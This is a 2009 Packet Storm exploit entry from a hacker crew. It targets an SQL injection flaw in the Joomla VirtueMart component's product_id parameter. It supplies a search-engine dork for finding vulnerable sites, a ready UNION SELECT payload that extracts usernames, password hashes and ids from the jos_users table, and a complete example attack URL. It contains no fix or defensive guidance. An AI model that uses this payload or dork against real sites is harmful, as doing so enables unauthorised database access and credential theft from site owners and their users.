Joomla Virtuemart SQL Injection

2009-12-14T00:00:00
ID PACKETSTORM:83777
Type packetstorm
Reporter SOA Crew
Modified 2009-12-14T00:00:00

Description

                                        
                                            `[#] Title:  
Joomla Component com_virtuemart SQL injection vulnerability (product_id)  
  
[#] Author:  
SOA Crew a.k.a Neo-GabrieL  
[gabriel_666@rocketmail.com]  
visit us:  
http://indonesianhacker.com/  
  
**********************************/  
  
[#] Software Information  
Vendor : http://virtuemart.net/  
Download : -  
Version : 1.0  
Vulnerability : SQL injection  
Dork : inurl:"com_virtuemart"  
Price : Free  
Date : 07-12-09  
================================================  
  
[#] Vulnerable  
http://localhost/index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection]  
  
[#] Exploit  
6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id),26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users--  
  
[#] Ex. Query  
+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1-  
  
[#] Live Demo  
http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product_id=6995+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,concat(username,0x3a,password,0x3a,gid,0x3a,id)Gabriel,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55+from+jos_users+limit+1,1--&category_id=10&manufacturer_id=11&option=com_virtuemart&Itemid=1&vmcchk=1&Itemid=1  
  
**********************************/  
  
[#] Thx to  
- HI Cyber4rt crew  
[Facebook: Hacker Indonesia]  
- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU  
  
  
  
`